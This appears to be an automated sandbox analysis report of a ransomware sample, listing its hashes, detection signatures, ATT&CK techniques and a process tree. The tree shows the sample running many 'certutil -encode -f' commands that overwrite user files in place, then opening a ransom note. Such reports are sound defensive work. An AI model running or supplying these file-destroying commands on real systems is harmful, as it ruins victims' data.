55aa5e191a82d31ff9eb2ac6937895dec35c248cd8b346c50e1ba24e8eaba7b3

Analysis

max time kernel
91s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
18-10-2022 11:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aff17_load_priority_f.exe
Size

385KB
MD5

8c50ab521ac15859a58e67f3f763e9d2
SHA1

80c15b88d6556fb8462b9a89ee88c38db7b5b3ff
SHA256

55aa5e191a82d31ff9eb2ac6937895dec35c248cd8b346c50e1ba24e8eaba7b3
SHA512

2c61b389d75845c14d889cb7977b3d61efc0fda88f3722a602694bac3fe9d63d2f7b439c4a948d20f4a81fe910ea2fb3166d24ae3b989139ebb053e0097481f5
SSDEEP

3072:QQD/XygRxLw/mxA+PwkvhHB7V4hmszU1akCwVMgTorYkxHXEh8jE63uw7E2m4huP:QArRpw/mxA+ZxB54q/VrkHX2jA+GI3

Score

8^/10

ransomware

Malware Config

Signatures

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	C:\Users\Admin\Pictures\MountMeasure.tiff	certutil.exe
File opened for modification	C:\Users\Admin\Pictures\MountMeasure.tiff	certutil.exe
File created	C:\Users\Admin\Pictures\SwitchSearch.tiff	certutil.exe
File opened for modification	C:\Users\Admin\Pictures\SwitchSearch.tiff	certutil.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	aff17_load_priority_f.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\Documents\desktop.ini	certutil.exe
File created	C:\Users\Admin\Desktop\desktop.ini	certutil.exe
File created	C:\Users\Admin\Music\desktop.ini	certutil.exe
File created	C:\Users\Admin\Pictures\desktop.ini	certutil.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	aff17_load_priority_f.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1212	NOTEPAD.EXE

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4940	aff17_load_priority_f.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4940 wrote to memory of 3652	4940	aff17_load_priority_f.exe	87
PID 4940 wrote to memory of 3652	4940	aff17_load_priority_f.exe	87
PID 4940 wrote to memory of 1516	4940	aff17_load_priority_f.exe	89
PID 4940 wrote to memory of 1516	4940	aff17_load_priority_f.exe	89
PID 4940 wrote to memory of 216	4940	aff17_load_priority_f.exe	91
PID 4940 wrote to memory of 216	4940	aff17_load_priority_f.exe	91
PID 4940 wrote to memory of 4484	4940	aff17_load_priority_f.exe	93
PID 4940 wrote to memory of 4484	4940	aff17_load_priority_f.exe	93
PID 4940 wrote to memory of 4840	4940	aff17_load_priority_f.exe	96
PID 4940 wrote to memory of 4840	4940	aff17_load_priority_f.exe	96
PID 4940 wrote to memory of 3096	4940	aff17_load_priority_f.exe	99
PID 4940 wrote to memory of 3096	4940	aff17_load_priority_f.exe	99
PID 4940 wrote to memory of 1496	4940	aff17_load_priority_f.exe	101
PID 4940 wrote to memory of 1496	4940	aff17_load_priority_f.exe	101
PID 4940 wrote to memory of 2968	4940	aff17_load_priority_f.exe	103
PID 4940 wrote to memory of 2968	4940	aff17_load_priority_f.exe	103
PID 4940 wrote to memory of 3380	4940	aff17_load_priority_f.exe	105
PID 4940 wrote to memory of 3380	4940	aff17_load_priority_f.exe	105
PID 4940 wrote to memory of 4456	4940	aff17_load_priority_f.exe	107
PID 4940 wrote to memory of 4456	4940	aff17_load_priority_f.exe	107
PID 4940 wrote to memory of 2004	4940	aff17_load_priority_f.exe	109
PID 4940 wrote to memory of 2004	4940	aff17_load_priority_f.exe	109
PID 4940 wrote to memory of 3684	4940	aff17_load_priority_f.exe	111
PID 4940 wrote to memory of 3684	4940	aff17_load_priority_f.exe	111
PID 4940 wrote to memory of 2696	4940	aff17_load_priority_f.exe	113
PID 4940 wrote to memory of 2696	4940	aff17_load_priority_f.exe	113
PID 4940 wrote to memory of 5044	4940	aff17_load_priority_f.exe	115
PID 4940 wrote to memory of 5044	4940	aff17_load_priority_f.exe	115
PID 4940 wrote to memory of 668	4940	aff17_load_priority_f.exe	117
PID 4940 wrote to memory of 668	4940	aff17_load_priority_f.exe	117
PID 4940 wrote to memory of 1372	4940	aff17_load_priority_f.exe	119
PID 4940 wrote to memory of 1372	4940	aff17_load_priority_f.exe	119
PID 4940 wrote to memory of 4764	4940	aff17_load_priority_f.exe	121
PID 4940 wrote to memory of 4764	4940	aff17_load_priority_f.exe	121
PID 4940 wrote to memory of 2192	4940	aff17_load_priority_f.exe	123
PID 4940 wrote to memory of 2192	4940	aff17_load_priority_f.exe	123
PID 4940 wrote to memory of 3600	4940	aff17_load_priority_f.exe	125
PID 4940 wrote to memory of 3600	4940	aff17_load_priority_f.exe	125
PID 4940 wrote to memory of 2280	4940	aff17_load_priority_f.exe	127
PID 4940 wrote to memory of 2280	4940	aff17_load_priority_f.exe	127
PID 4940 wrote to memory of 1244	4940	aff17_load_priority_f.exe	130
PID 4940 wrote to memory of 1244	4940	aff17_load_priority_f.exe	130
PID 4940 wrote to memory of 2620	4940	aff17_load_priority_f.exe	132
PID 4940 wrote to memory of 2620	4940	aff17_load_priority_f.exe	132
PID 4940 wrote to memory of 4284	4940	aff17_load_priority_f.exe	134
PID 4940 wrote to memory of 4284	4940	aff17_load_priority_f.exe	134
PID 4940 wrote to memory of 4644	4940	aff17_load_priority_f.exe	136
PID 4940 wrote to memory of 4644	4940	aff17_load_priority_f.exe	136
PID 4940 wrote to memory of 3704	4940	aff17_load_priority_f.exe	138
PID 4940 wrote to memory of 3704	4940	aff17_load_priority_f.exe	138
PID 4940 wrote to memory of 3276	4940	aff17_load_priority_f.exe	140
PID 4940 wrote to memory of 3276	4940	aff17_load_priority_f.exe	140
PID 4940 wrote to memory of 3960	4940	aff17_load_priority_f.exe	142
PID 4940 wrote to memory of 3960	4940	aff17_load_priority_f.exe	142
PID 4940 wrote to memory of 4048	4940	aff17_load_priority_f.exe	144
PID 4940 wrote to memory of 4048	4940	aff17_load_priority_f.exe	144
PID 4940 wrote to memory of 4288	4940	aff17_load_priority_f.exe	146
PID 4940 wrote to memory of 4288	4940	aff17_load_priority_f.exe	146
PID 4940 wrote to memory of 1276	4940	aff17_load_priority_f.exe	148
PID 4940 wrote to memory of 1276	4940	aff17_load_priority_f.exe	148
PID 4940 wrote to memory of 4236	4940	aff17_load_priority_f.exe	150
PID 4940 wrote to memory of 4236	4940	aff17_load_priority_f.exe	150
PID 4940 wrote to memory of 3328	4940	aff17_load_priority_f.exe	152
PID 4940 wrote to memory of 3328	4940	aff17_load_priority_f.exe	152

C:\Users\Admin\AppData\Local\Temp\aff17_load_priority_f.exe
"C:\Users\Admin\AppData\Local\Temp\aff17_load_priority_f.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\AddDisable.vsdm" "C:\Users\Admin\Desktop\AddDisable.vsdm"
  2⤵
  PID:3652
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\CheckpointLimit.mpeg2" "C:\Users\Admin\Desktop\CheckpointLimit.mpeg2"
  2⤵
  PID:1516
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\ConnectOpen.dot" "C:\Users\Admin\Desktop\ConnectOpen.dot"
  2⤵
  PID:216
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\desktop.ini" "C:\Users\Admin\Desktop\desktop.ini"
  2⤵
  - Drops desktop.ini file(s)
  PID:4484
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\DisableInitialize.7z" "C:\Users\Admin\Desktop\DisableInitialize.7z"
  2⤵
  PID:4840
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\DismountRedo.xls" "C:\Users\Admin\Desktop\DismountRedo.xls"
  2⤵
  PID:3096
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\FormatResolve.jpg" "C:\Users\Admin\Desktop\FormatResolve.jpg"
  2⤵
  PID:1496
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\GetTrace.vsdx" "C:\Users\Admin\Desktop\GetTrace.vsdx"
  2⤵
  PID:2968
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\ImportOut.asp" "C:\Users\Admin\Desktop\ImportOut.asp"
  2⤵
  PID:3380
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\InitializeApprove.vsdm" "C:\Users\Admin\Desktop\InitializeApprove.vsdm"
  2⤵
  PID:4456
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\InvokeComplete.xht" "C:\Users\Admin\Desktop\InvokeComplete.xht"
  2⤵
  PID:2004
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\Microsoft Edge.lnk" "C:\Users\Admin\Desktop\Microsoft Edge.lnk"
  2⤵
  PID:3684
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\MoveCompare.ogg" "C:\Users\Admin\Desktop\MoveCompare.ogg"
  2⤵
  PID:2696
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\PushDisconnect.rar" "C:\Users\Admin\Desktop\PushDisconnect.rar"
  2⤵
  PID:5044
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\RegisterUse.php" "C:\Users\Admin\Desktop\RegisterUse.php"
  2⤵
  PID:668
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\ResumeEnter.midi" "C:\Users\Admin\Desktop\ResumeEnter.midi"
  2⤵
  PID:1372
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\StepComplete.TS" "C:\Users\Admin\Desktop\StepComplete.TS"
  2⤵
  PID:4764
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\StepLimit.M2V" "C:\Users\Admin\Desktop\StepLimit.M2V"
  2⤵
  PID:2192
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\StepRedo.aiff" "C:\Users\Admin\Desktop\StepRedo.aiff"
  2⤵
  PID:3600
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\TestSuspend.vb" "C:\Users\Admin\Desktop\TestSuspend.vb"
  2⤵
  PID:2280
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\UseEdit.cfg" "C:\Users\Admin\Desktop\UseEdit.cfg"
  2⤵
  PID:1244
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\WriteBlock.eps" "C:\Users\Admin\Desktop\WriteBlock.eps"
  2⤵
  PID:2620
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Desktop\WriteRegister.mpeg3" "C:\Users\Admin\Desktop\WriteRegister.mpeg3"
  2⤵
  PID:4284
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\CompressOpen.ps1" "C:\Users\Admin\Music\CompressOpen.ps1"
  2⤵
  PID:4644
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\ConvertGet.pub" "C:\Users\Admin\Music\ConvertGet.pub"
  2⤵
  PID:3704
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\CopySearch.potx" "C:\Users\Admin\Music\CopySearch.potx"
  2⤵
  PID:3276
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\CopyUse.mp2" "C:\Users\Admin\Music\CopyUse.mp2"
  2⤵
  PID:3960
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\DebugStart.png" "C:\Users\Admin\Music\DebugStart.png"
  2⤵
  PID:4048
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\desktop.ini" "C:\Users\Admin\Music\desktop.ini"
  2⤵
  - Drops desktop.ini file(s)
  PID:4288
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\ExitRestart.WTV" "C:\Users\Admin\Music\ExitRestart.WTV"
  2⤵
  PID:1276
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\ExpandSelect.DVR" "C:\Users\Admin\Music\ExpandSelect.DVR"
  2⤵
  PID:4236
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\GrantSend.ps1" "C:\Users\Admin\Music\GrantSend.ps1"
  2⤵
  PID:3328
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\GroupCompare.ex_" "C:\Users\Admin\Music\GroupCompare.ex_"
  2⤵
  PID:4112
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\LimitMount.zip" "C:\Users\Admin\Music\LimitMount.zip"
  2⤵
  PID:4564
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\OpenPop.asf" "C:\Users\Admin\Music\OpenPop.asf"
  2⤵
  PID:508
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\OutApprove.aif" "C:\Users\Admin\Music\OutApprove.aif"
  2⤵
  PID:1972
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\ReceiveRestart.mpe" "C:\Users\Admin\Music\ReceiveRestart.mpe"
  2⤵
  PID:4916
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\RequestCopy.ico" "C:\Users\Admin\Music\RequestCopy.ico"
  2⤵
  PID:4268
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\RequestGet.TS" "C:\Users\Admin\Music\RequestGet.TS"
  2⤵
  PID:2260
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\ShowResize.htm" "C:\Users\Admin\Music\ShowResize.htm"
  2⤵
  PID:220
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\SplitResolve.dot" "C:\Users\Admin\Music\SplitResolve.dot"
  2⤵
  PID:2392
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\StartDeny.svg" "C:\Users\Admin\Music\StartDeny.svg"
  2⤵
  PID:3936
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\StepSplit.ogg" "C:\Users\Admin\Music\StepSplit.ogg"
  2⤵
  PID:4616
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\SyncMount.jtx" "C:\Users\Admin\Music\SyncMount.jtx"
  2⤵
  PID:708
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Music\UndoStop.AAC" "C:\Users\Admin\Music\UndoStop.AAC"
  2⤵
  PID:372
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\ApproveSelect.wmf" "C:\Users\Admin\Pictures\ApproveSelect.wmf"
  2⤵
  PID:3624
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\CompleteCheckpoint.cr2" "C:\Users\Admin\Pictures\CompleteCheckpoint.cr2"
  2⤵
  PID:5020
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\CompletePing.emf" "C:\Users\Admin\Pictures\CompletePing.emf"
  2⤵
  PID:1488
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\ConnectEnable.cr2" "C:\Users\Admin\Pictures\ConnectEnable.cr2"
  2⤵
  PID:5008
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\ConvertFromRevoke.wmf" "C:\Users\Admin\Pictures\ConvertFromRevoke.wmf"
  2⤵
  PID:3308
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\CopyNew.gif" "C:\Users\Admin\Pictures\CopyNew.gif"
  2⤵
  PID:4948
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\desktop.ini" "C:\Users\Admin\Pictures\desktop.ini"
  2⤵
  - Drops desktop.ini file(s)
  PID:3900
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\DisconnectUnprotect.wmf" "C:\Users\Admin\Pictures\DisconnectUnprotect.wmf"
  2⤵
  PID:4224
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\EnterUnpublish.pcx" "C:\Users\Admin\Pictures\EnterUnpublish.pcx"
  2⤵
  PID:1476
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\InstallSuspend.svg" "C:\Users\Admin\Pictures\InstallSuspend.svg"
  2⤵
  PID:3560
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\LimitInvoke.wmf" "C:\Users\Admin\Pictures\LimitInvoke.wmf"
  2⤵
  PID:4448
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\MeasureBlock.ico" "C:\Users\Admin\Pictures\MeasureBlock.ico"
  2⤵
  PID:3364
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\MeasureRequest.jpg" "C:\Users\Admin\Pictures\MeasureRequest.jpg"
  2⤵
  PID:1308
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\MountMeasure.tiff" "C:\Users\Admin\Pictures\MountMeasure.tiff"
  2⤵
  - Modifies extensions of user files
  PID:2052
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\MoveEnter.pcx" "C:\Users\Admin\Pictures\MoveEnter.pcx"
  2⤵
  PID:2720
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\MoveUnprotect.dib" "C:\Users\Admin\Pictures\MoveUnprotect.dib"
  2⤵
  PID:2588
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\My Wallpaper.jpg" "C:\Users\Admin\Pictures\My Wallpaper.jpg"
  2⤵
  PID:3116
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\OptimizeUse.wmf" "C:\Users\Admin\Pictures\OptimizeUse.wmf"
  2⤵
  PID:5056
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\PingOut.eps" "C:\Users\Admin\Pictures\PingOut.eps"
  2⤵
  PID:4592
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\ProtectLimit.svg" "C:\Users\Admin\Pictures\ProtectLimit.svg"
  2⤵
  PID:804
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\ProtectRestart.dwg" "C:\Users\Admin\Pictures\ProtectRestart.dwg"
  2⤵
  PID:4888
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\RequestProtect.crw" "C:\Users\Admin\Pictures\RequestProtect.crw"
  2⤵
  PID:4736
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\ResetOptimize.pcx" "C:\Users\Admin\Pictures\ResetOptimize.pcx"
  2⤵
  PID:4788
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\SelectSuspend.emz" "C:\Users\Admin\Pictures\SelectSuspend.emz"
  2⤵
  PID:4544
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\StartSubmit.cr2" "C:\Users\Admin\Pictures\StartSubmit.cr2"
  2⤵
  PID:4848
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\StepApprove.cr2" "C:\Users\Admin\Pictures\StepApprove.cr2"
  2⤵
  PID:4084
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\StopMerge.eps" "C:\Users\Admin\Pictures\StopMerge.eps"
  2⤵
  PID:4124
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\SubmitGrant.svgz" "C:\Users\Admin\Pictures\SubmitGrant.svgz"
  2⤵
  PID:4464
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\SwitchSearch.tiff" "C:\Users\Admin\Pictures\SwitchSearch.tiff"
  2⤵
  - Modifies extensions of user files
  PID:2036
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\UnblockHide.emf" "C:\Users\Admin\Pictures\UnblockHide.emf"
  2⤵
  PID:1240
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\UnregisterRedo.jpg" "C:\Users\Admin\Pictures\UnregisterRedo.jpg"
  2⤵
  PID:2468
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\UseAdd.crw" "C:\Users\Admin\Pictures\UseAdd.crw"
  2⤵
  PID:3928
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Pictures\WaitSkip.dib" "C:\Users\Admin\Pictures\WaitSkip.dib"
  2⤵
  PID:3332
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\AddRename.txt" "C:\Users\Admin\Documents\AddRename.txt"
  2⤵
  PID:3868
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\Are.docx" "C:\Users\Admin\Documents\Are.docx"
  2⤵
  PID:1012
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\AssertSave.mhtml" "C:\Users\Admin\Documents\AssertSave.mhtml"
  2⤵
  PID:4500
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\CompleteJoin.docx" "C:\Users\Admin\Documents\CompleteJoin.docx"
  2⤵
  PID:4408
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\ConvertFromSuspend.docx" "C:\Users\Admin\Documents\ConvertFromSuspend.docx"
  2⤵
  PID:2116
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\desktop.ini" "C:\Users\Admin\Documents\desktop.ini"
  2⤵
  - Drops desktop.ini file(s)
  PID:4008
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\DismountBackup.htm" "C:\Users\Admin\Documents\DismountBackup.htm"
  2⤵
  PID:3264
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\EnterClose.xlsx" "C:\Users\Admin\Documents\EnterClose.xlsx"
  2⤵
  PID:1252
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\EnterInitialize.vdx" "C:\Users\Admin\Documents\EnterInitialize.vdx"
  2⤵
  PID:3248
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\Files.docx" "C:\Users\Admin\Documents\Files.docx"
  2⤵
  PID:4152
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\GroupDisconnect.htm" "C:\Users\Admin\Documents\GroupDisconnect.htm"
  2⤵
  PID:832
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\HideComplete.docm" "C:\Users\Admin\Documents\HideComplete.docm"
  2⤵
  PID:3732
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\ImportOptimize.odp" "C:\Users\Admin\Documents\ImportOptimize.odp"
  2⤵
  PID:344
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\MoveRevoke.xlsx" "C:\Users\Admin\Documents\MoveRevoke.xlsx"
  2⤵
  PID:4756
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\Opened.docx" "C:\Users\Admin\Documents\Opened.docx"
  2⤵
  PID:1484
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\OutPush.html" "C:\Users\Admin\Documents\OutPush.html"
  2⤵
  PID:1232
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\PopStart.dotm" "C:\Users\Admin\Documents\PopStart.dotm"
  2⤵
  PID:5052
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\PublishExport.pps" "C:\Users\Admin\Documents\PublishExport.pps"
  2⤵
  PID:4476
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\Recently.docx" "C:\Users\Admin\Documents\Recently.docx"
  2⤵
  PID:4968
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\RegisterUndo.vdx" "C:\Users\Admin\Documents\RegisterUndo.vdx"
  2⤵
  PID:4960
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\RenameRegister.vstx" "C:\Users\Admin\Documents\RenameRegister.vstx"
  2⤵
  PID:4480
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\RequestRepair.vssm" "C:\Users\Admin\Documents\RequestRepair.vssm"
  2⤵
  PID:4472
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\ResizeUninstall.xps" "C:\Users\Admin\Documents\ResizeUninstall.xps"
  2⤵
  PID:1464
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\RestoreFormat.mhtml" "C:\Users\Admin\Documents\RestoreFormat.mhtml"
  2⤵
  PID:1184
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\SearchExpand.vdw" "C:\Users\Admin\Documents\SearchExpand.vdw"
  2⤵
  PID:916
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\SplitPush.docx" "C:\Users\Admin\Documents\SplitPush.docx"
  2⤵
  PID:1792
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\StepLock.vdw" "C:\Users\Admin\Documents\StepLock.vdw"
  2⤵
  PID:1724
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\StopGet.pps" "C:\Users\Admin\Documents\StopGet.pps"
  2⤵
  PID:524
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\These.docx" "C:\Users\Admin\Documents\These.docx"
  2⤵
  PID:4496
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\UnprotectCheckpoint.vsd" "C:\Users\Admin\Documents\UnprotectCheckpoint.vsd"
  2⤵
  PID:2636
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\UnprotectReceive.vstm" "C:\Users\Admin\Documents\UnprotectReceive.vstm"
  2⤵
  PID:2388
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\WatchPop.pub" "C:\Users\Admin\Documents\WatchPop.pub"
  2⤵
  PID:4012
- C:\Windows\SYSTEM32\certutil.exe
  certutil -encode -f "C:\Users\Admin\Documents\WatchRename.vssm" "C:\Users\Admin\Documents\WatchRename.vssm"
  2⤵
  PID:2372
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HOW_TO_DECRYPT_FILES.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1212

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\HOW_TO_DECRYPT_FILES.txt

Filesize
